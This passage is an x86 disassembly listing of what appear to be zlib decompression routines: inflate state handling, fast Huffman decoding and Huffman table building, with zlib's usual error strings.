sub eax, ecx
loc_4DCC25: ; CODE XREF: sub_4DCBEB+33�j
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
mov eax, ds:dword_4E0318[eax*4]
mov [ebp+var_14], eax
mov eax, [ebp+arg_4]
mov eax, ds:dword_4E0318[eax*4]
mov [ebp+arg_4], eax
loc_4DCC42: ; CODE XREF: sub_4DCBEB+72�j
; sub_4DCBEB+231�j
cmp edx, 14h
jnb short loc_4DCC5F
mov eax, [ebp+var_8]
dec [ebp+var_4]
mov ecx, edx
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_14], eax
inc [ebp+var_8]
add edx, 8
jmp short loc_4DCC42
; ---------------------------------------------------------------------------
loc_4DCC5F: ; CODE XREF: sub_4DCBEB+5A�j
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_8]
and eax, [ebp+arg_14]
lea eax, [ecx+eax*8]
movzx ecx, byte ptr [eax]
mov [ebp+arg_0], ecx
test ecx, ecx
loc_4DCC73: ; CODE XREF: sub_4DCBEB+C4�j
movzx ecx, byte ptr [eax+1]
jz loc_4DCDF6
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
sub edx, ecx
mov ecx, [ebp+arg_0]
test cl, 10h
jnz short loc_4DCCB1
test cl, 40h
jnz loc_4DCE56
mov ecx, ds:dword_4E0318[ecx*4]
and ecx, [ebp+arg_14]
add ecx, [eax+4]
lea eax, [eax+ecx*8]
movzx ecx, byte ptr [eax]
mov [ebp+arg_0], ecx
test ecx, ecx
jmp short loc_4DCC73
; ---------------------------------------------------------------------------
loc_4DCCB1: ; CODE XREF: sub_4DCBEB+A1�j
and ecx, 0Fh
mov esi, ds:dword_4E0318[ecx*4]
and esi, [ebp+arg_14]
shr [ebp+arg_14], cl
add esi, [eax+4]
sub edx, ecx
mov [ebp+arg_0], esi
loc_4DCCC9: ; CODE XREF: sub_4DCBEB+F9�j
cmp edx, 0Fh
jnb short loc_4DCCE6
mov eax, [ebp+var_8]
dec [ebp+var_4]
mov ecx, edx
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_14], eax
inc [ebp+var_8]
add edx, 8
jmp short loc_4DCCC9
; ---------------------------------------------------------------------------
loc_4DCCE6: ; CODE XREF: sub_4DCBEB+E1�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_C]
and eax, [ebp+arg_14]
movzx ebx, byte ptr [ecx+eax*8]
lea eax, [ecx+eax*8]
movzx ecx, byte ptr [eax+1]
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
sub edx, ecx
loc_4DCD03: ; CODE XREF: sub_4DCBEB+146�j
test bl, 10h
jnz short loc_4DCD33
test bl, 40h
jnz loc_4DCE21
mov ecx, ds:dword_4E0318[ebx*4]
and ecx, [ebp+arg_14]
add ecx, [eax+4]
movzx ebx, byte ptr [eax+ecx*8]
lea eax, [eax+ecx*8]
movzx ecx, byte ptr [eax+1]
shr [ebp+arg_14], cl
mov [ebp+var_18], ecx
sub edx, ecx
jmp short loc_4DCD03
; ---------------------------------------------------------------------------
loc_4DCD33: ; CODE XREF: sub_4DCBEB+11B�j
and ebx, 0Fh
loc_4DCD36: ; CODE XREF: sub_4DCBEB+165�j
cmp edx, ebx
jnb short loc_4DCD52
mov ecx, [ebp+var_8]
dec [ebp+var_4]
movzx esi, byte ptr [ecx]
mov ecx, edx
shl esi, cl
or [ebp+arg_14], esi
inc [ebp+var_8]
add edx, 8
jmp short loc_4DCD36
; ---------------------------------------------------------------------------
loc_4DCD52: ; CODE XREF: sub_4DCBEB+14D�j
mov esi, ds:dword_4E0318[ebx*4]
mov ecx, ebx
and esi, [ebp+arg_14]
sub edx, ebx
shr [ebp+arg_14], cl
add esi, [eax+4]
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
sub [ebp+var_10], eax
mov ebx, [ebp+arg_10]
mov eax, ecx
sub eax, esi
mov esi, [ebx+28h]
cmp eax, esi
jnb short loc_4DCDD2
mov ebx, [ebx+2Ch]
mov [ebp+var_18], ebx
sub ebx, esi
loc_4DCD85: ; CODE XREF: sub_4DCBEB+19E�j
add eax, ebx
cmp eax, esi
jb short loc_4DCD85
mov esi, [ebp+var_18]
sub esi, eax
cmp [ebp+arg_0], esi
jbe short loc_4DCDB4
sub [ebp+arg_0], esi
loc_4DCD98: ; CODE XREF: sub_4DCBEB+1B4�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec esi
jnz short loc_4DCD98
mov eax, [ebp+arg_10]
mov esi, [eax+28h]
loc_4DCDA7: ; CODE XREF: sub_4DCBEB+1C5�j
mov al, [esi]
mov [ecx], al
inc ecx
inc esi
dec [ebp+arg_0]
jnz short loc_4DCDA7
jmp short loc_4DCDEE
; ---------------------------------------------------------------------------
loc_4DCDB4: ; CODE XREF: sub_4DCBEB+1A8�j
mov bl, [eax]
mov [ecx], bl
mov bl, [eax+1]
inc ecx
inc eax
mov [ecx], bl
inc ecx
inc eax
sub [ebp+arg_0], 2
loc_4DCDC5: ; CODE XREF: sub_4DCBEB+1E3�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec [ebp+arg_0]
jnz short loc_4DCDC5
jmp short loc_4DCDEE
; ---------------------------------------------------------------------------
loc_4DCDD2: ; CODE XREF: sub_4DCBEB+190�j
mov bl, [eax]
mov [ecx], bl
mov bl, [eax+1]
inc ecx
inc eax
mov [ecx], bl
inc ecx
inc eax
sub [ebp+arg_0], 2
loc_4DCDE3: ; CODE XREF: sub_4DCBEB+201�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec [ebp+arg_0]
jnz short loc_4DCDE3
loc_4DCDEE: ; CODE XREF: sub_4DCBEB+1C7�j
; sub_4DCBEB+1E5�j
mov esi, [ebp+arg_10]
mov [ebp+var_C], ecx
jmp short loc_4DCE0D
; ---------------------------------------------------------------------------
loc_4DCDF6: ; CODE XREF: sub_4DCBEB+8C�j
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
mov al, [eax+4]
sub edx, ecx
mov ecx, [ebp+var_C]
inc [ebp+var_C]
dec [ebp+var_10]
mov [ecx], al
loc_4DCE0D: ; CODE XREF: sub_4DCBEB+209�j
cmp [ebp+var_10], 102h
jb short loc_4DCE41
cmp [ebp+var_4], 0Ah
jb short loc_4DCE41
jmp loc_4DCC42
; ---------------------------------------------------------------------------
loc_4DCE21: ; CODE XREF: sub_4DCBEB+120�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
mov dword ptr [edi+18h], offset aInvalidDistanc ; "invalid distance code"
shr eax, 3
cmp eax, ecx
jnb short loc_4DCE39
mov ecx, eax
loc_4DCE39: ; CODE XREF: sub_4DCBEB+24A�j
mov esi, [ebp+arg_10]
push 0FFFFFFFDh
pop eax
jmp short loc_4DCE8B
; ---------------------------------------------------------------------------
loc_4DCE41: ; CODE XREF: sub_4DCBEB+229�j
; sub_4DCBEB+22F�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
shr eax, 3
cmp eax, ecx
jnb short loc_4DCE52
mov ecx, eax
loc_4DCE52: ; CODE XREF: sub_4DCBEB+263�j
xor eax, eax
jmp short loc_4DCE8B
; ---------------------------------------------------------------------------
loc_4DCE56: ; CODE XREF: sub_4DCBEB+A6�j
test cl, 20h
jz short loc_4DCE70
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
shr eax, 3
cmp eax, ecx
jnb short loc_4DCE6C
mov ecx, eax
loc_4DCE6C: ; CODE XREF: sub_4DCBEB+27D�j
push 1
jmp short loc_4DCE8A
; ---------------------------------------------------------------------------
loc_4DCE70: ; CODE XREF: sub_4DCBEB+26E�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
mov dword ptr [edi+18h], offset aInvalidLiteral ; "invalid literal/length code"
shr eax, 3
cmp eax, ecx
jnb short loc_4DCE88
mov ecx, eax
loc_4DCE88: ; CODE XREF: sub_4DCBEB+299�j
push 0FFFFFFFDh
loc_4DCE8A: ; CODE XREF: sub_4DCBEB+283�j
pop eax
loc_4DCE8B: ; CODE XREF: sub_4DCBEB+254�j
; sub_4DCBEB+269�j
mov ebx, [ebp+arg_14]
sub [ebp+var_8], ecx
mov [esi+20h], ebx
mov ebx, ecx
shl ebx, 3
sub edx, ebx
mov [esi+1Ch], edx
mov edx, [ebp+var_4]
add ecx, edx
mov [edi+4], ecx
mov ecx, [ebp+var_8]
mov edx, ecx
sub edx, [edi]
mov [edi], ecx
mov ecx, [ebp+var_C]
add [edi+8], edx
mov [esi+34h], ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4DCBEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DCEBD proc near ; CODE XREF: sub_4DCF41+D4�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
cmp eax, edx
jz short loc_4DCEFB
mov ecx, [eax+1Ch]
cmp ecx, edx
jz short loc_4DCEFB
push esi
mov [eax+14h], edx
mov [eax+8], edx
mov [eax+18h], edx
mov esi, [ecx+0Ch]
push edx
neg esi
sbb esi, esi
push eax
and esi, 7
mov [ecx], esi
mov eax, [eax+1Ch]
push dword ptr [eax+14h]
call sub_4DBB53
add esp, 0Ch
xor eax, eax
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4DCEFB: ; CODE XREF: sub_4DCEBD+A�j
; sub_4DCEBD+11�j
push 0FFFFFFFEh
pop eax
pop ebp
retn
sub_4DCEBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DCF00 proc near ; CODE XREF: sub_4DCF41+C9�p
; sub_4DD9F3+59�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_4DCF3B
mov eax, [esi+1Ch]
test eax, eax
jz short loc_4DCF3B
cmp dword ptr [esi+24h], 0
jz short loc_4DCF3B
mov eax, [eax+14h]
test eax, eax
jz short loc_4DCF28
push esi
push eax
call sub_4DC5B0
pop ecx
pop ecx
loc_4DCF28: ; CODE XREF: sub_4DCF00+1D�j
push dword ptr [esi+1Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
and dword ptr [esi+1Ch], 0
pop ecx
pop ecx
xor eax, eax
jmp short loc_4DCF3E
; ---------------------------------------------------------------------------
loc_4DCF3B: ; CODE XREF: sub_4DCF00+9�j
; sub_4DCF00+10�j ...
push 0FFFFFFFEh
pop eax
loc_4DCF3E: ; CODE XREF: sub_4DCF00+39�j
pop esi
pop ebp
retn
sub_4DCF00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DCF41 proc near ; CODE XREF: sub_4DD02B+E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
xor edi, edi
cmp eax, edi
jz loc_4DD023
mov al, [eax]
cmp al, ds:byte_4DF0A8
jnz loc_4DD023
cmp [ebp+arg_C], 38h
jnz loc_4DD023
mov esi, [ebp+arg_0]
cmp esi, edi
jnz short loc_4DCF7A
push 0FFFFFFFEh
jmp loc_4DD025
; ---------------------------------------------------------------------------
loc_4DCF7A: ; CODE XREF: sub_4DCF41+30�j
cmp [esi+20h], edi
mov [esi+18h], edi
jnz short loc_4DCF8C
mov dword ptr [esi+20h], offset sub_4DDA72
mov [esi+28h], edi
loc_4DCF8C: ; CODE XREF: sub_4DCF41+3F�j
cmp [esi+24h], edi
jnz short loc_4DCF98
mov dword ptr [esi+24h], offset sub_4DDA8C
loc_4DCF98: ; CODE XREF: sub_4DCF41+4E�j
push 18h
push 1
pop ebx
push ebx
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
cmp eax, edi
mov [esi+1Ch], eax
jnz short loc_4DCFB2
push 0FFFFFFFCh
jmp short loc_4DD025
; ---------------------------------------------------------------------------
loc_4DCFB2: ; CODE XREF: sub_4DCF41+6B�j
mov ecx, [ebp+arg_4]
mov [eax+14h], edi
mov eax, [esi+1Ch]
cmp ecx, edi
mov [eax+0Ch], edi
jge short loc_4DCFCA
mov eax, [esi+1Ch]
neg ecx
mov [eax+0Ch], ebx
loc_4DCFCA: ; CODE XREF: sub_4DCF41+7F�j
cmp ecx, 8
jl short loc_4DD01F
cmp ecx, 0Fh
jg short loc_4DD01F
mov eax, [esi+1Ch]
shl ebx, cl
mov [eax+10h], ecx
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
neg eax
sbb eax, eax
push ebx
not eax
and eax, offset sub_4CCF6E
push eax
push esi
call sub_4DBBBF
mov ecx, [esi+1Ch]
add esp, 0Ch
mov [ecx+14h], eax
mov eax, [esi+1Ch]
cmp [eax+14h], edi
jnz short loc_4DD014
push 0FFFFFFFCh
loc_4DD008: ; CODE XREF: sub_4DCF41+E0�j
pop edi
push esi
call sub_4DCF00
pop ecx
mov eax, edi
jmp short loc_4DD026
; ---------------------------------------------------------------------------
loc_4DD014: ; CODE XREF: sub_4DCF41+C3�j
push esi
call sub_4DCEBD
pop ecx
xor eax, eax
jmp short loc_4DD026
; ---------------------------------------------------------------------------
loc_4DD01F: ; CODE XREF: sub_4DCF41+8C�j
; sub_4DCF41+91�j
push 0FFFFFFFEh
jmp short loc_4DD008
; ---------------------------------------------------------------------------
loc_4DD023: ; CODE XREF: sub_4DCF41+D�j
; sub_4DCF41+1B�j ...
push 0FFFFFFFAh
loc_4DD025: ; CODE XREF: sub_4DCF41+34�j
; sub_4DCF41+6F�j
pop eax
loc_4DD026: ; CODE XREF: sub_4DCF41+D1�j
; sub_4DCF41+DC�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4DCF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DD02B proc near ; CODE XREF: sub_4DD9F3+35�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_4]
push 0Fh
push [ebp+arg_0]
call sub_4DCF41
add esp, 10h
pop ebp
retn
sub_4DD02B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DD043 proc near ; CODE XREF: sub_4DD9F3+47�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor eax, eax
cmp esi, eax
push edi
jz loc_4DD355 ; default
cmp [esi+1Ch], eax
jz loc_4DD355 ; default
cmp [esi], eax
jz loc_4DD355 ; default
cmp [ebp+arg_4], 4
push 0FFFFFFFBh
pop ebx
mov [ebp+arg_4], ebx
jz short loc_4DD076
mov [ebp+arg_4], eax
loc_4DD076: ; CODE XREF: sub_4DD043+2E�j
; sub_4DD043+111�j
push 0Dh
pop edi
loc_4DD079: ; CODE XREF: sub_4DD043+8A�j
; sub_4DD043+FA�j ...
mov eax, [esi+1Ch]
mov ecx, [eax]
cmp ecx, edi ; switch 14 cases
ja loc_4DD355 ; default
jmp ds:off_4DD36E[ecx*4] ; switch jump
loc_4DD08D: ; DATA XREF: _4:off_4DD36E�o
mov ecx, [esi+4] ; jumptable 004DD086 case 0
test ecx, ecx
jz loc_4DD27F
dec ecx
inc dword ptr [esi+8]
mov [esi+4], ecx
mov ecx, [esi]
mov ebx, [ebp+arg_4]
movzx ecx, byte ptr [ecx]
mov [eax+4], ecx
mov eax, [esi+1Ch]
mov ecx, [eax+4]
and ecx, 0Fh
inc dword ptr [esi]
cmp cl, 8
jz short loc_4DD0CF
mov [eax], edi
mov dword ptr [esi+18h], offset aUnknownCompres ; "unknown compression method"
loc_4DD0C3: ; CODE XREF: sub_4DD043+A3�j
; sub_4DD043+237�j
mov eax, [esi+1Ch]
mov dword ptr [eax+4], 5
jmp short loc_4DD079
; ---------------------------------------------------------------------------
loc_4DD0CF: ; CODE XREF: sub_4DD043+75�j
mov ecx, [eax+4]
shr ecx, 4
add ecx, 8
cmp ecx, [eax+10h]
jbe short loc_4DD0E8
mov [eax], edi
mov dword ptr [esi+18h], offset aInvalidWindowS ; "invalid window size"
jmp short loc_4DD0C3
; ---------------------------------------------------------------------------
loc_4DD0E8: ; CODE XREF: sub_4DD043+98�j
mov dword ptr [eax], 1
loc_4DD0EE: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
mov eax, [esi+4] ; jumptable 004DD086 case 1
test eax, eax
jz loc_4DD27F
mov ecx, [ebp+arg_4]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
mov eax, [esi]
mov [ebp+arg_0], ecx
mov ecx, [esi+1Ch]
push 1Fh
movzx ebx, byte ptr [eax]
inc eax
xor edx, edx
mov [esi], eax
mov eax, [ecx+4]
shl eax, 8
add eax, ebx
pop edi
div edi
test edx, edx
jz short loc_4DD142
push 0Dh
mov ebx, [ebp+arg_0]
pop edi
mov [ecx], edi
mov eax, [esi+1Ch]
mov dword ptr [esi+18h], offset aIncorrectHeade ; "incorrect header check"
mov dword ptr [eax+4], 5
jmp loc_4DD079
; ---------------------------------------------------------------------------
loc_4DD142: ; CODE XREF: sub_4DD043+DF�j
test bl, 20h
jnz loc_4DD286
mov ebx, [ebp+arg_0]
mov dword ptr [ecx], 7
jmp loc_4DD076
; ---------------------------------------------------------------------------
loc_4DD159: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
push ebx ; jumptable 004DD086 case 7
push esi
push dword ptr [eax+14h]
call sub_4DBC4B
mov ebx, eax
add esp, 0Ch
cmp ebx, 0FFFFFFFDh
jnz short loc_4DD17E
mov eax, [esi+1Ch]
mov [eax], edi
mov eax, [esi+1Ch]
and dword ptr [eax+4], 0
jmp loc_4DD079
; ---------------------------------------------------------------------------
loc_4DD17E: ; CODE XREF: sub_4DD043+128�j
test ebx, ebx
jnz short loc_4DD185
mov ebx, [ebp+arg_4]
loc_4DD185: ; CODE XREF: sub_4DD043+13D�j
cmp ebx, 1
jnz loc_4DD27F
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
lea ecx, [eax+4]
push ecx
push esi
push dword ptr [eax+14h]
call sub_4DBB53
mov eax, [esi+1Ch]
add esp, 0Ch
cmp dword ptr [eax+0Ch], 0
jz short loc_4DD1B8
mov dword ptr [eax], 0Ch
jmp loc_4DD079
; ---------------------------------------------------------------------------
loc_4DD1B8: ; CODE XREF: sub_4DD043+168�j
mov dword ptr [eax], 8
loc_4DD1BE: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
mov eax, [esi+4] ; jumptable 004DD086 case 8
test eax, eax
jz loc_4DD27F
dec eax
inc dword ptr [esi+8]
mov ecx, [esi+1Ch]
mov [esi+4], eax
mov eax, [esi]
mov ebx, [ebp+arg_4]
movzx eax, byte ptr [eax]
shl eax, 18h
mov [ecx+8], eax
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 9
loc_4DD1EC: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
mov eax, [esi+4] ; jumptable 004DD086 case 9
test eax, eax
jz loc_4DD27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 10h
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 0Ah
loc_4DD21A: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
mov eax, [esi+4] ; jumptable 004DD086 case 10
test eax, eax
jz short loc_4DD27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 8
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 0Bh
loc_4DD244: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
mov eax, [esi+4] ; jumptable 004DD086 case 11
test eax, eax
jz short loc_4DD27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov ecx, [eax+4]
cmp ecx, [eax+8]
jz loc_4DD35D
mov [eax], edi
mov dword ptr [esi+18h], offset aIncorrectDataC ; "incorrect data check"
jmp loc_4DD0C3
; ---------------------------------------------------------------------------
loc_4DD27F: ; CODE XREF: sub_4DD043+4F�j
; sub_4DD043+B0�j ...
mov eax, ebx
jmp loc_4DD358
; ---------------------------------------------------------------------------
loc_4DD286: ; CODE XREF: sub_4DD043+102�j
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_0]
mov dword ptr [eax], 2
loc_4DD292: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
mov eax, [esi+4] ; jumptable 004DD086 case 2
test eax, eax
jz short loc_4DD27F
dec eax
inc dword ptr [esi+8]
mov ecx, [esi+1Ch]
mov [esi+4], eax
mov eax, [esi]
mov ebx, [ebp+arg_4]
movzx eax, byte ptr [eax]
shl eax, 18h
mov [ecx+8], eax
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 3
loc_4DD2BC: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
mov eax, [esi+4] ; jumptable 004DD086 case 3
test eax, eax
jz short loc_4DD27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 10h
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 4
loc_4DD2E6: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
mov eax, [esi+4] ; jumptable 004DD086 case 4
test eax, eax
jz short loc_4DD27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 8
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 5
loc_4DD310: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
mov eax, [esi+4] ; jumptable 004DD086 case 5
test eax, eax
jz loc_4DD27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
push 2
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov ecx, [eax+8]
mov [esi+30h], ecx
mov dword ptr [eax], 6
jmp short loc_4DD357
; ---------------------------------------------------------------------------
loc_4DD342: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
mov eax, [esi+1Ch] ; jumptable 004DD086 case 6
mov [eax], edi
mov eax, [esi+1Ch]
mov dword ptr [esi+18h], offset aNeedDictionary ; "need dictionary"
and dword ptr [eax+4], 0
loc_4DD355: ; CODE XREF: sub_4DD043+D�j
; sub_4DD043+16�j ...
push 0FFFFFFFEh ; default
loc_4DD357: ; CODE XREF: sub_4DD043+2FD�j
; sub_4DD043+325�j ...
pop eax
loc_4DD358: ; CODE XREF: sub_4DD043+23E�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4DD35D: ; CODE XREF: sub_4DD043+228�j
mov eax, [esi+1Ch]
mov dword ptr [eax], 0Ch
loc_4DD366: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
push 1 ; jumptable 004DD086 case 12
jmp short loc_4DD357
; ---------------------------------------------------------------------------
loc_4DD36A: ; CODE XREF: sub_4DD043+43�j
; DATA XREF: _4:off_4DD36E�o
push 0FFFFFFFDh ; jumptable 004DD086 case 13
jmp short loc_4DD357
sub_4DD043 endp
; ---------------------------------------------------------------------------
off_4DD36E dd offset loc_4DD08D ; DATA XREF: sub_4DD043+43�r
dd offset loc_4DD0EE ; jump table for switch statement
dd offset loc_4DD292
dd offset loc_4DD2BC
dd offset loc_4DD2E6
dd offset loc_4DD310
dd offset loc_4DD342
dd offset loc_4DD159
dd offset loc_4DD1BE
dd offset loc_4DD1EC
dd offset loc_4DD21A
dd offset loc_4DD244
dd offset loc_4DD366
dd offset loc_4DD36A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DD3A6 proc near ; CODE XREF: sub_4DBC4B+3C5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_10]
push 4
push 13h
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebp+arg_10], eax
test eax, eax
jnz short loc_4DD3CB
push 0FFFFFFFCh
pop eax
jmp short loc_4DD422
; ---------------------------------------------------------------------------
loc_4DD3CB: ; CODE XREF: sub_4DD3A6+1E�j
push ebx
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_8]
push 0
push 0
push 13h
push 13h
push [ebp+arg_0]
call sub_4DD425
mov ebx, eax
add esp, 28h
cmp ebx, 0FFFFFFFDh
jnz short loc_4DD3FD
mov dword ptr [esi+18h], offset aOversubscribed ; "oversubscribed dynamic bit lengths tree"...
jmp short loc_4DD414
; ---------------------------------------------------------------------------
loc_4DD3FD: ; CODE XREF: sub_4DD3A6+4C�j
cmp ebx, 0FFFFFFFBh
jz short loc_4DD40A
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_4DD414
loc_4DD40A: ; CODE XREF: sub_4DD3A6+5A�j
push 0FFFFFFFDh
mov dword ptr [esi+18h], offset aIncompleteDyna ; "incomplete dynamic bit lengths tree"
pop ebx
loc_4DD414: ; CODE XREF: sub_4DD3A6+55�j
; sub_4DD3A6+62�j
push [ebp+arg_10]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov eax, ebx
pop ecx
pop ebx
loc_4DD422: ; CODE XREF: sub_4DD3A6+23�j
pop esi
leave
retn
sub_4DD3A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DD425 proc near ; CODE XREF: sub_4DD3A6+3F�p
; sub_4DD7AC+52�p ...
var_F0 = dword ptr -0F0h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 0F0h
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor edx, edx
mov [ebp+var_74], edx
mov [ebp+var_70], edx
mov [ebp+var_6C], edx
mov [ebp+var_68], edx
mov [ebp+var_64], edx
mov [ebp+var_60], edx
mov [ebp+var_5C], edx
mov [ebp+var_58], edx
mov [ebp+var_54], edx
mov [ebp+var_50], edx
mov [ebp+var_4C], edx
mov [ebp+var_48], edx
mov [ebp+var_44], edx
mov [ebp+var_40], edx
mov [ebp+var_3C], edx
mov [ebp+var_38], edx
mov esi, edi
loc_4DD46B: ; CODE XREF: sub_4DD425+54�j
mov eax, [ecx]
add ecx, 4
inc [ebp+eax*4+var_74]
lea eax, [ebp+eax*4+var_74]
dec esi
jnz short loc_4DD46B
cmp [ebp+var_74], edi
jnz short loc_4DD491
mov eax, [ebp+arg_14]
mov [eax], edx
mov eax, [ebp+arg_18]
mov [eax], edx
loc_4DD48A: ; CODE XREF: sub_4DD425+36F�j
; sub_4DD425+379�j
xor eax, eax
loc_4DD48C: ; CODE XREF: sub_4DD425+382�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4DD491: ; CODE XREF: sub_4DD425+59�j
mov edi, [ebp+arg_18]
push 1
pop ebx
lea eax, [ebp+var_70]
mov esi, [edi]
mov ecx, ebx
mov [ebp+arg_18], esi
loc_4DD4A1: ; CODE XREF: sub_4DD425+87�j
cmp [eax], edx
jnz short loc_4DD4AE
inc ecx
add eax, 4
cmp ecx, 0Fh
jbe short loc_4DD4A1
